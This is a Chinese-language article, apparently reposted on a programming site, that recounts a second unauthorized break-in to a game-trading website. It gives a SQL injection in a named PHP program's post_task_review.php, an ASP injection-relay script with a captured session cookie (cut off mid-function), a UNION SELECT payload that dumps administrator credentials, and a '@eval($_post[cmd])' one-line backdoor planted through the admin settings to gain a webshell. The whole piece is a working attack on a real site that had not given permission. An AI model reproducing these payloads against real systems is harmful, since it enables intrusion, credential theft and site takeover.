欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

入侵某一游戏交易网

程序员文章站 2022-10-03 12:35:40
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程 一: 踩点 收集信息 因为这个已经是第二次入侵,所以具体的信息我已... 08-10-08...
在这次入侵之前我已经拿到过一次这个网站的shell了,但是被删除了,由于不甘心又拿了一次,才有了下面的过程

一: 踩点 收集信息

因为这个已经是第二次入侵,所以具体的信息我已经基本上掌握

服务器上13个站点,大多数站点很安全,因为第一渗透的时候,是由

http://www.shanxxx.xx 这个站进入的

我这个人比较恋旧,所以第二次也决定由这个站点进行入侵,

由后台看出这个站的程序是raico_v1[1].2_cs 如图1

入侵某一游戏交易网

直接从网上down下来,读代码,当然这里的php代码 本人是非常的菜鸟,感谢我的好友jackal,他的脚本是相当的强悍,呵呵

二: 漏洞在哪里?它在灯火阑珊处

这个程序的漏洞文件是在post_task_review.php

由于过滤不严格导致注入,下面我会在文章中详细说明如何利用,

首先在shan这个站注册个用户 并抓取登陆的cookie值,在到本地或者webshell上建立一个注入中转站的文件

内容如下

http://www.shanxxx.xx/post_task_review.php"

jmref="http://www.shanxxx.xx/post_task.php"

jmcok="__utma=213560918.3117244849183171600.1213283730.1213293786.1213305387.4; __utmz=213560918.1213283730.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=213560918.21.10.1213305387; __utmc=213560918; phpsessid=96b20d4edfe8477cf276aa639bfc31d3"

jmstr=urlencoding(jmstr)

response.write postdata(jmurl,jmstr,jmcok,jmref)

function postdata(posturl,poststr,postcok,postref)

dim http

set http = server.createobject("msxml2.serverxmlhttp")

with http

.open "post",posturl,false

.setrequestheader "content-length",len(poststr)

.setrequestheader "content-type","application/x-www-form-urlencoded"

.setrequestheader "referer",postref

.setrequestheader "cookie",postcok

.send poststr

postdata = .responsebody

end with

set http = nothing

postdata =bytes2bstr(postdata)

end function

function bytes2bstr(vin)

dim strreturn

dim i, thischarcode, nextcharcode

strreturn = ""

for i = 1 to lenb(vin)

thischarcode = ascb(midb(vin, i, 1))

if thischarcode

之后浏览地址为http://localhost/jmpost.asp?id=1107 and 1=2 union select -1,concat(admin_name,admin_pw) from rco_admin/* 就可以直接爆出管理员的用户名和密码 如图2

入侵某一游戏交易网

三: 获取webshell 拿到目标站的路径.

登陆后台

,只能上传图片,抓包上传,截断 ,未能实现.

但是后台的配置那可以插一句话

a'";@eval($_post[cmd]);//

写进去本来是site="a\'\";@eval"

但是过滤了'

就成了site="a\\";@eval;//"

这样成功的闭合了前面的双引,把后面的双引注释掉了.中间的;@eval($_post[cmd]);就可以执行了.

把a'";@eval($_post[cmd]);// 写进去就保存到一个文件里了.

这个文件被所有的文件包含.

所以我们直接同一句话连接端连接网站的任何一个文件都可以获得webshell. 如图

入侵某一游戏交易网

入侵某一游戏交易网

直接传php没传上去,所以把php马改成jpg格式的,之后在一句话连接端中修改成php的

顺利拿到webshell如图,

入侵某一游戏交易网